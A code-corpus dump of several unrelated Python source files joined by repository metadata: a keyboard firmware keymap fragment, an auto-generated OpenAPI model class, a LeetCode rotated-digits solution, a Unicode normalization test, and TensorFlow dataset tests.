b'\x87' # D
b'\x88' # E
b'\x89' # F
b'\x8a' # G
b'\x8b' # H
b'\x8c' # I
b'\x8d' # J
b'\x8e' # K
b'\x8f' # L
b'\x90' # M
b'\x91' # N
b'\x92' # O
b'\x93' # P
b'\x94' # Q
b'\x95' # R
b'\x96' # S
b'\x97' # T
b'\x98' # U
b'\x99' # V
b'\x9a' # W
b'\x9b' # X
b'\x9c' # Y
b'\x9d' # Z
b'\x2f' # [
b'\x31' # \ backslash
b'\x30' # ]
b'\xa3' # ^ (shift 6)
b'\xad' # _ (shift -)
b'\x35' # `
b'\x04' # a
b'\x05' # b
b'\x06' # c
b'\x07' # d
b'\x08' # e
b'\x09' # f
b'\x0a' # g
b'\x0b' # h
b'\x0c' # i
b'\x0d' # j
b'\x0e' # k
b'\x0f' # l
b'\x10' # m
b'\x11' # n
b'\x12' # o
b'\x13' # p
b'\x14' # q
b'\x15' # r
b'\x16' # s
b'\x17' # t
b'\x18' # u
b'\x19' # v
b'\x1a' # w
b'\x1b' # x
b'\x1c' # y
b'\x1d' # z
b'\xaf' # { (shift [)
b'\xb1' # | (shift \)
b'\xb0' # } (shift ])
b'\xb5' # ~ (shift `)
b'\x4c' # DEL DELETE Forward
)
# /* Key Actions */
# ACT_MODS = 0b0000,
# ACT_LMODS = 0b0000,
# ACT_RMODS = 0b0001,
# ACT_MODS_TAP = 0b0010,
# ACT_LMODS_TAP = 0b0010,
# ACT_RMODS_TAP = 0b0011,
# /* Other Keys */
# ACT_USAGE = 0b0100,
# ACT_MOUSEKEY = 0b0101,
# /* Layer Actions */
# ACT_LAYER = 0b1000,
# ACT_LAYER_TAP = 0b1010, /* Layer 0-15 */
# ACT_LAYER_TAP_EXT = 0b1011, /* Layer 16-31 */
# /* Extensions */
# ACT_MACRO = 0b1100,
# ACT_BACKLIGHT = 0b1101,
# ACT_COMMAND = 0b1110,
# ACT_FUNCTION = 0b1111
# };
ACT_MODS = 0b0000
ACT_MODS_TAP = 0b0010
ACT_USAGE = 0b0100
ACT_MOUSEKEY = 0b0101
ACT_LAYER = 0b1000
ACT_LAYER_TAP = 0b1010 # Layer 0-15
ACT_LAYER_TAP_EXT = 0b1011 # Layer 16-31
ACT_MACRO = 0b1100
ACT_BACKLIGHT = 0b1101
ACT_COMMAND = 0b1110
ACT_FUNCTION = 0b1111
OP_BIT_AND = 0
OP_BIT_OR = 1
OP_BIT_XOR = 2
OP_BIT_SET = 3
ON_PRESS = 1
ON_RELEASE = 2
ON_BOTH = 3
OP_TAP_TOGGLE = 0xF0
# convert keyname to action code
def get_action_code(x):
if type(x) is int:
return x if x > 9 else ASCII_TO_KEYCODE[ord(str(x))]
if type(x) is str and len(x) == 1:
return ASCII_TO_KEYCODE[ord(x)] & 0x7F
if x is None:
return 0
raise ValueError('Invalid keyname {}'.format(x))
def MODS(*args):
MAP = { LCTRL: 1, LSHIFT: 2, LALT: 4, LGUI: 8, RCTRL: 0x11, RSHIFT: 0x12, RALT: 0x14, RGUI: 0x18 }
mods = 0
for m in args:
if m not in MAP:
raise ValueError('Invalid modifier {}'.format(m))
mods |= MAP[m]
return mods
def mods_to_keycodes(mods):
# if mods & 0x10:
# all_mods = (RCTRL, RSHIFT, RALT, RGUI)
# else:
# all_mods = (LCTRL, LSHIFT, LALT, LGUI)
# return list(filter(lambda k: mods & (1 << (k & 0x3)), all_mods))
b = RCTRL if mods & 0x10 else LCTRL
o = []
for i in range(4):
if (mods >> i) & 1:
o.append(b + i)
return o
ACTION = lambda kind, param: (kind << 12) | param
MODS_KEY = lambda mods, key: ACTION(ACT_MODS, (mods << 8) | get_action_code(key))
MODS_TAP = lambda mods, key: ACTION(ACT_MODS_TAP, (mods << 8) | get_action_code(key))
MOUSEKEY = lambda key: ACTION(ACT_MOUSEKEY, key)
LAYER_BITOP = lambda op, part, bits, on: ACTION(ACT_LAYER, op<<10|on<<8|part<<5|(bits&0x1f))
LAYER_BIT_XOR = lambda part, bits, on: LAYER_BITOP(OP_BIT_XOR, part, bits, on)
LAYER_INVERT = lambda layer, on: LAYER_BIT_XOR(layer/4, 1<<(layer%4), on)
LAYER_TOGGLE = lambda layer: LAYER_INVERT(layer, ON_RELEASE)
LAYER_TAP = lambda layer, key=NO: ACTION(ACT_LAYER_TAP, (layer << 8) | get_action_code(key))
LAYER_TAP_TOGGLE = lambda layer: LAYER_TAP(layer, OP_TAP_TOGGLE)
LAYER_MODS = lambda layer, mods: LAYER_TAP(layer, 0xC0 | mods)
ACTION_USAGE_SYSTEM = lambda n: ACTION(ACT_USAGE, n)
ACTION_USAGE_CONSUMER = lambda n: ACTION(ACT_USAGE, 1 << 10 | (n))
ACTION_MOUSEKEY = lambda key: ACTION(ACT_MOUSEKEY, key)
MS_BTN1 = MOUSEKEY(1 << 0)
MS_BTN2 = MOUSEKEY(1 << 1)
MS_BTN3 = MOUSEKEY(1 << 2)
MS_BTN4 = MOUSEKEY(1 << 3)
MS_BTN5 = MOUSEKEY(1 << 4)
MS_UP = MOUSEKEY(1 << 8)
MS_DN = MOUSEKEY(2 << 8)
MS_LT = MOUSEKEY(3 << 8)
MS_RT = MOUSEKEY(4 << 8)
MS_UL = MOUSEKEY(5 << 8)
MS_UR = MOUSEKEY(6 << 8)
MS_DL = MOUSEKEY(7 << 8)
MS_DR = MOUSEKEY(8 << 8)
MS_W_UP = MOUSEKEY(9 << 8)
MS_W_DN = MOUSEKEY(10 << 8)
MS_MOVEMENT = (
(0, 0, 0),
(0, -2, 0), (0, 2, 0), (-2, 0, 0), (2, 0, 0),
(-1, -1, 0), (1, -1, 0), (-1, 1, 0), (1, 1, 0),
(0, 0, 1), (0, 0, -1)
)
MACRO = lambda n: ACTION(ACT_MACRO, n)
BACKLIGHT = lambda n: ACTION(ACT_BACKLIGHT, n)
RGB_TOGGLE = BACKLIGHT(0)
RGB_MOD = BACKLIGHT(1)
MOD_RGB = BACKLIGHT(2)
RGB_HUE = BACKLIGHT(3)
HUE_RGB = BACKLIGHT(4)
RGB_SAT = BACKLIGHT(5)
SAT_RGB = BACKLIGHT(6)
RGB_VAL = BACKLIGHT(7)
VAL_RGB = BACKLIGHT(8)
COMMAND = lambda opt, n: ACTION(ACT_COMMAND, opt << 8 | n)
BOOTLOADER = COMMAND(0, 0)
HEATMAP = COMMAND(0, 1)
SUSPEND = COMMAND(0, 2)
SHUTDOWN = COMMAND(0, 3)
USB_TOGGLE = COMMAND(0, 4)
BT = lambda n: COMMAND(1, n)
BT0 = BT(0)
BT1 = BT(1)
BT2 = BT(2)
BT3 = BT(3)
BT4 = BT(4)
BT5 = BT(5)
BT6 = BT(6)
BT7 = BT(7)
BT8 = BT(8)
BT9 = BT(9)
BT_TOGGLE = BT(0xFF)
BT_ON = BT(0xFE)
BT_OFF = BT(0xFD)
# Consumer Page(0x0C)
AUDIO_MUTE = ACTION_USAGE_CONSUMER(0x00E2)
AUDIO_VOL_UP = ACTION_USAGE_CONSUMER(0x00E9)
AUDIO_VOL_DOWN = ACTION_USAGE_CONSUMER(0x00EA)
TRANSPORT_NEXT_TRACK = ACTION_USAGE_CONSUMER(0x00B5)
TRANSPORT_PREV_TRACK = ACTION_USAGE_CONSUMER(0x00B6)
TRANSPORT_STOP = ACTION_USAGE_CONSUMER(0x00B7)
TRANSPORT_STOP_EJECT = ACTION_USAGE_CONSUMER(0x00CC)
TRANSPORT_PLAY_PAUSE = ACTION_USAGE_CONSUMER(0x00CD)
# application launch
APPLAUNCH_CC_CONFIG = ACTION_USAGE_CONSUMER(0x0183)
APPLAUNCH_EMAIL = ACTION_USAGE_CONSUMER(0x018A)
APPLAUNCH_CALCULATOR = ACTION_USAGE_CONSUMER(0x0192)
APPLAUNCH_LOCAL_BROWSER = ACTION_USAGE_CONSUMER(0x0194)
# application control
APPCONTROL_SEARCH = ACTION_USAGE_CONSUMER(0x0221)
APPCONTROL_HOME = ACTION_USAGE_CONSUMER(0x0223)
APPCONTROL_BACK = ACTION_USAGE_CONSUMER(0x0224)
APPCONTROL_FORWARD = ACTION_USAGE_CONSUMER(0x0225)
APPCONTROL_STOP = ACTION_USAGE_CONSUMER(0x0226)
APPCONTROL_REFRESH = ACTION_USAGE_CONSUMER(0x0227)
APPCONTROL_BOOKMARKS = ACTION_USAGE_CONSUMER(0x022A)
# supplement for Bluegiga iWRAP HID(not supported by Windows?)
APPLAUNCH_LOCK = ACTION_USAGE_CONSUMER(0x019E)
TRANSPORT_RECORD = ACTION_USAGE_CONSUMER(0x00B2)
TRANSPORT_FAST_FORWARD = ACTION_USAGE_CONSUMER(0x00B3)
TRANSPORT_REWIND = ACTION_USAGE_CONSUMER(0x00B4)
TRANSPORT_EJECT = ACTION_USAGE_CONSUMER(0x00B8)
APPCONTROL_MINIMIZE = ACTION_USAGE_CONSUMER(0x0206)
# https://docs.microsoft.com/en-us/windows-hardware/drivers/hid/display-brightness-control
DISPLAY_BRIGHTNESS_UP = ACTION_USAGE_CONSUMER(0x006F)
DISPLAY_BRIGHTNESS_DOWN = ACTION_USAGE_CONSUMER(0x0070)
| 25.409375
| 102
| 0.610319
|
4a0f197fa1bb5bc946bb63577c729952a1240772
| 10,911
|
py
|
Python
|
code/python/IRNCustomSymbols/v1/fds/sdk/IRNCustomSymbols/model/standard_symbol_dto.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/IRNCustomSymbols/v1/fds/sdk/IRNCustomSymbols/model/standard_symbol_dto.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/IRNCustomSymbols/v1/fds/sdk/IRNCustomSymbols/model/standard_symbol_dto.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
IRN API v1
Allows users to extract, create, update and configure IRN data. # noqa: E501
The version of the OpenAPI document: 1
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from fds.sdk.IRNCustomSymbols.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from fds.sdk.IRNCustomSymbols.exceptions import ApiAttributeError
class StandardSymbolDto(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'standard_symbol': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'standard_symbol': 'standardSymbol', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, standard_symbol, *args, **kwargs): # noqa: E501
"""StandardSymbolDto - a model defined in OpenAPI
Args:
standard_symbol (str):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.standard_symbol = standard_symbol
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, standard_symbol, *args, **kwargs): # noqa: E501
"""StandardSymbolDto - a model defined in OpenAPI
Args:
standard_symbol (str):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.standard_symbol = standard_symbol
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| 42.621094
| 121
| 0.570983
|
4a0f1baf4760e8af92bee70d9df29bc85e4a16a6
| 2,790
|
py
|
Python
|
Python/rotated-digits.py
|
ShuaiWangGit/LeetCode
|
d85a4cb23f8f85059691994e7ad89001c6e4f3f6
|
[
"MIT"
] | 4
|
2019-08-06T01:55:23.000Z
|
2021-12-12T21:04:01.000Z
|
Python/rotated-digits.py
|
ShuaiWangGit/LeetCode
|
d85a4cb23f8f85059691994e7ad89001c6e4f3f6
|
[
"MIT"
] | null | null | null |
Python/rotated-digits.py
|
ShuaiWangGit/LeetCode
|
d85a4cb23f8f85059691994e7ad89001c6e4f3f6
|
[
"MIT"
] | 8
|
2020-02-20T08:21:12.000Z
|
2022-02-17T05:53:21.000Z
|
# Time: O(logn)
# Space: O(logn)
# X is a good number if after rotating each digit individually by 180 degrees,
# we get a valid number that is different from X.
# A number is valid if each digit remains a digit after rotation.
# 0, 1, and 8 rotate to themselves; 2 and 5 rotate to each other;
# 6 and 9 rotate to each other, and the rest of the numbers do not rotate to any other number.
#
# Now given a positive number N, how many numbers X from 1 to N are good?
#
# Example:
# Input: 10
# Output: 4
# Explanation:
# There are four good numbers in the range [1, 10] : 2, 5, 6, 9.
# Note that 1 and 10 are not good numbers, since they remain unchanged after rotating.
#
# Note:
# - N will be in range [1, 10000].
# memoization (top-down dp)
class Solution(object):
def rotatedDigits(self, N):
"""
:type N: int
:rtype: int
"""
A = map(int, str(N))
invalid, diff = set([3, 4, 7]), set([2, 5, 6, 9])
def dp(A, i, is_prefix_equal, is_good, lookup):
if i == len(A): return int(is_good)
if (i, is_prefix_equal, is_good) not in lookup:
result = 0
for d in xrange(A[i]+1 if is_prefix_equal else 10):
if d in invalid: continue
result += dp(A, i+1,
is_prefix_equal and d == A[i],
is_good or d in diff,
lookup)
lookup[i, is_prefix_equal, is_good] = result
return lookup[i, is_prefix_equal, is_good]
lookup = {}
return dp(A, 0, True, False, lookup)
# Time: O(n)
# Space: O(n)
class Solution2(object):
def rotatedDigits(self, N):
"""
:type N: int
:rtype: int
"""
INVALID, SAME, DIFF = 0, 1, 2
same, diff = [0, 1, 8], [2, 5, 6, 9]
dp = [0] * (N+1)
dp[0] = SAME
for i in xrange(N//10+1):
if dp[i] != INVALID:
for j in same:
if i*10+j <= N:
dp[i*10+j] = max(SAME, dp[i])
for j in diff:
if i*10+j <= N:
dp[i*10+j] = DIFF
return dp.count(DIFF)
# Time: O(nlogn) = O(n), because O(logn) = O(32) by this input
# Space: O(logn) = O(1)
class Solution3(object):
def rotatedDigits(self, N):
"""
:type N: int
:rtype: int
"""
invalid, diff = set(['3', '4', '7']), set(['2', '5', '6', '9'])
result = 0
for i in xrange(N+1):
lookup = set(list(str(i)))
if invalid & lookup:
continue
if diff & lookup:
result += 1
return result
| 31.348315
| 94
| 0.491756
|
4a0f1c50055fa8812453d8fc05f485d8c7513f88
| 3,134
|
py
|
Python
|
Lib/test/test_normalization.py
|
legacy-buildtools/python-2.6.7
|
3be140725590f1a43f7ab8c9fd99f876c3f81536
|
[
"PSF-2.0"
] | 1
|
2015-01-05T10:24:11.000Z
|
2015-01-05T10:24:11.000Z
|
Lib/test/test_normalization.py
|
legacy-buildtools/python-2.6.7
|
3be140725590f1a43f7ab8c9fd99f876c3f81536
|
[
"PSF-2.0"
] | null | null | null |
Lib/test/test_normalization.py
|
legacy-buildtools/python-2.6.7
|
3be140725590f1a43f7ab8c9fd99f876c3f81536
|
[
"PSF-2.0"
] | null | null | null |
from test.test_support import run_unittest, open_urlresource, TestSkipped
import unittest
import sys
import os
from unicodedata import normalize, unidata_version
TESTDATAFILE = "NormalizationTest" + os.extsep + "txt"
TESTDATAURL = "http://www.unicode.org/Public/" + unidata_version + "/ucd/" + TESTDATAFILE
if os.path.exists(TESTDATAFILE):
f = open(TESTDATAFILE)
l = f.readline()
f.close()
if not unidata_version in l:
os.unlink(TESTDATAFILE)
class RangeError(Exception):
pass
def NFC(str):
return normalize("NFC", str)
def NFKC(str):
return normalize("NFKC", str)
def NFD(str):
return normalize("NFD", str)
def NFKD(str):
return normalize("NFKD", str)
def unistr(data):
data = [int(x, 16) for x in data.split(" ")]
for x in data:
if x > sys.maxunicode:
raise RangeError
return u"".join([unichr(x) for x in data])
class NormalizationTest(unittest.TestCase):
def test_main(self):
part1_data = {}
for line in open_urlresource(TESTDATAURL):
if '#' in line:
line = line.split('#')[0]
line = line.strip()
if not line:
continue
if line.startswith("@Part"):
part = line.split()[0]
continue
try:
c1,c2,c3,c4,c5 = [unistr(x) for x in line.split(';')[:-1]]
except RangeError:
# Skip unsupported characters;
# try atleast adding c1 if we are in part1
if part == "@Part1":
try:
c1 = unistr(line.split(';')[0])
except RangeError:
pass
else:
part1_data[c1] = 1
continue
# Perform tests
self.failUnless(c2 == NFC(c1) == NFC(c2) == NFC(c3), line)
self.failUnless(c4 == NFC(c4) == NFC(c5), line)
self.failUnless(c3 == NFD(c1) == NFD(c2) == NFD(c3), line)
self.failUnless(c5 == NFD(c4) == NFD(c5), line)
self.failUnless(c4 == NFKC(c1) == NFKC(c2) == \
NFKC(c3) == NFKC(c4) == NFKC(c5),
line)
self.failUnless(c5 == NFKD(c1) == NFKD(c2) == \
NFKD(c3) == NFKD(c4) == NFKD(c5),
line)
# Record part 1 data
if part == "@Part1":
part1_data[c1] = 1
# Perform tests for all other data
for c in range(sys.maxunicode+1):
X = unichr(c)
if X in part1_data:
continue
self.failUnless(X == NFC(X) == NFD(X) == NFKC(X) == NFKD(X), c)
def test_bug_834676(self):
# Check for bug 834676
normalize('NFC', u'\ud55c\uae00')
def test_main():
# Hit the exception early
try:
open_urlresource(TESTDATAURL)
except IOError:
raise TestSkipped("could not retrieve " + TESTDATAURL)
run_unittest(NormalizationTest)
if __name__ == "__main__":
test_main()
| 30.134615
| 89
| 0.516911
|
4a0f1c9308edf9393351d385c4e0bfaabc3bf707
| 690
|
py
|
Python
|
location.py
|
scastillosanchez/HACKRPI
|
ece78dc821f65c2d7d85d695a6de3aa3ab60634d
|
[
"MIT"
] | null | null | null |
location.py
|
scastillosanchez/HACKRPI
|
ece78dc821f65c2d7d85d695a6de3aa3ab60634d
|
[
"MIT"
] | null | null | null |
location.py
|
scastillosanchez/HACKRPI
|
ece78dc821f65c2d7d85d695a6de3aa3ab60634d
|
[
"MIT"
] | null | null | null |
# location.py
from uszipcode import SearchEngine
import requests
API_KEY = 'dc5ea0e10f11465f9ea0e10f11e65fa6'
def get_location_coords(zipcode):
search = SearchEngine(simple_zipcode=True)
data = search.by_zipcode(zipcode)
data = data.to_json()
coords = [data["lat"], data["long"]]
return coords
def get_weather_alert(zipcode):
location = get_location_coords(zipcode)
coordinates = location[0] + ',' + location[1]
alert_url = 'https://api.weather.com/v3/alerts/headlines'
params = {'geocode': coordinates, 'format': 'json', 'Accept-Encoding': 'gzip'}
weather_response = requests.get(alert_url, params=params).json()
return weather_response
| 26.538462
| 82
| 0.715942
|
4a0f1db93709b87eae9b770087528fa84e5bd811
| 595
|
py
|
Python
|
myfirstpjt.py
|
helloworldtang/python-spider-study
|
b65bc646e716bd3cd421aa9c395507fded7aff06
|
[
"Apache-2.0"
] | null | null | null |
myfirstpjt.py
|
helloworldtang/python-spider-study
|
b65bc646e716bd3cd421aa9c395507fded7aff06
|
[
"Apache-2.0"
] | null | null | null |
myfirstpjt.py
|
helloworldtang/python-spider-study
|
b65bc646e716bd3cd421aa9c395507fded7aff06
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__title__ = ''
__author__ = 'tangcheng'
__mtime__ = '12/12/2017'
"""
from urllib import request
from urllib import parse
from urllib.request import urlopen
# http://dujia.qunar.com/pq/list_%E5%AE%9C%E6%98%8C?
# searchfrom=around&arounddep=%E6%AD%A6%E6%B1%89&tf=Ihot_01
data = {}
data['searchfrom'] = 'around'
data["arounddep"] = '%E6%AD%A6%E6%B1%89'
data['tf'] = 'Ihot_01'
value = parse.urlencode(data)
print(value)
url = 'http://dujia.qunar.com/pq/list_%E5%AE%9C%E6%98%8C' + '?' + value
response = urlopen(url)
print(response.read())
| 18.59375
| 71
| 0.672269
|
4a0f1f46974f276982ee76b99d4bc0f29eb6b8cb
| 25,882
|
py
|
Python
|
tensorflow/python/data/kernel_tests/dataset_test.py
|
mkuchnik/TF_PCR
|
c3cc6a9bad115925cd398d01cedd85af68aa1be2
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/data/kernel_tests/dataset_test.py
|
mkuchnik/TF_PCR
|
c3cc6a9bad115925cd398d01cedd85af68aa1be2
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/data/kernel_tests/dataset_test.py
|
mkuchnik/TF_PCR
|
c3cc6a9bad115925cd398d01cedd85af68aa1be2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import warnings
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import graph_pb2
from tensorflow.python.data.experimental.ops import distribute_options
from tensorflow.python.data.experimental.ops import testing
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import optional_ops
from tensorflow.python.data.ops import readers
from tensorflow.python.data.util import nest
from tensorflow.python.data.util import structure
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
class DatasetTest(test_base.DatasetTestBase, parameterized.TestCase):
@combinations.generate(test_base.default_test_combinations())
def testAsSerializedGraph(self):
dataset = dataset_ops.Dataset.range(10)
graph = graph_pb2.GraphDef().FromString(
self.evaluate(dataset._as_serialized_graph()))
self.assertTrue(any(node.op == "RangeDataset" for node in graph.node))
def testAsSerializedGraphStateful(self):
dataset = dataset_ops.Dataset.range(10).map(
lambda _: random_ops.random_uniform(()))
with self.assertRaises(errors.FailedPreconditionError):
self.evaluate(
dataset._as_serialized_graph(external_state_policy=distribute_options
.ExternalStatePolicy.FAIL))
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(init_from_file=[True, False])))
def testLookupTableGraphSerialization(self, init_from_file):
if init_from_file:
file = os.path.join(self.get_temp_dir(), "lookup_table_graph_serialize")
with open(file, "w") as f:
f.write("10\n11\n")
initializer = lookup_ops.TextFileInitializer(
file, dtypes.int64, lookup_ops.TextFileIndex.LINE_NUMBER,
dtypes.int64, lookup_ops.TextFileIndex.WHOLE_LINE)
else:
keys_tensor = constant_op.constant([0, 1], dtype=dtypes.int64)
vals_tensor = constant_op.constant([10, 11])
initializer = lookup_ops.KeyValueTensorInitializer(
keys_tensor, vals_tensor)
table = lookup_ops.StaticHashTable(initializer, -1)
dataset = dataset_ops.Dataset.range(3)
dataset = dataset.map(table.lookup)
self.evaluate(lookup_ops.tables_initializer())
round_tripped = self.graphRoundTrip(dataset)
del table
del dataset
self.assertDatasetProduces(
round_tripped, [10, 11, -1], requires_initialization=True)
@combinations.generate(test_base.default_test_combinations())
def testAsFunctionWithMap(self):
if not context.executing_eagerly():
self.skipTest("Only works executing eagerly")
with ops.device("CPU"):
original_dataset = dataset_ops.Dataset.range(5).map(lambda x: x * 2)
fn = original_dataset._trace_variant_creation()
variant = fn()
revived_dataset = dataset_ops._VariantDataset(
variant, original_dataset.element_spec)
self.assertDatasetProduces(revived_dataset, range(0, 10, 2))
@combinations.generate(test_base.default_test_combinations())
def testAsFunctionWithMapInFlatMap(self):
if not context.executing_eagerly():
self.skipTest("Only works executing eagerly")
with ops.device("CPU"):
original_dataset = dataset_ops.Dataset.range(5).flat_map(
lambda x: dataset_ops.Dataset.range(5).map(lambda x: x * 2))
fn = original_dataset._trace_variant_creation()
variant = fn()
revived_dataset = dataset_ops._VariantDataset(
variant, original_dataset.element_spec)
self.assertDatasetProduces(revived_dataset, list(original_dataset))
def _testNumInputs(self, dataset, num_inputs):
self.assertLen(dataset._inputs(), num_inputs)
@combinations.generate(test_base.default_test_combinations())
def testFixedLengthRecordInputs(self):
dataset = readers.FixedLengthRecordDataset("", 42)
self._testNumInputs(dataset, 0)
@combinations.generate(test_base.default_test_combinations())
def testFromGeneratorInputs(self):
def gen():
yield 42
dataset = dataset_ops.Dataset.from_generator(gen, dtypes.int32)
self._testNumInputs(dataset, 1)
@combinations.generate(test_base.default_test_combinations())
def testFromTensorsInputs(self):
dataset = dataset_ops.Dataset.from_tensors([42])
self._testNumInputs(dataset, 0)
@combinations.generate(test_base.default_test_combinations())
def testRangeInputs(self):
dataset = dataset_ops.Dataset.range(10)
self._testNumInputs(dataset, 0)
@combinations.generate(test_base.default_test_combinations())
def testTextLineInputs(self):
dataset = readers.TextLineDataset("")
self._testNumInputs(dataset, 0)
@combinations.generate(test_base.default_test_combinations())
def testTFRecordInputs(self):
dataset = readers.TFRecordDataset("")
self._testNumInputs(dataset, 1)
@combinations.generate(test_base.default_test_combinations())
def testProgressiveCompressedRecordInputs(self):
dataset = readers.ProgressiveCompressedRecordDataset("")
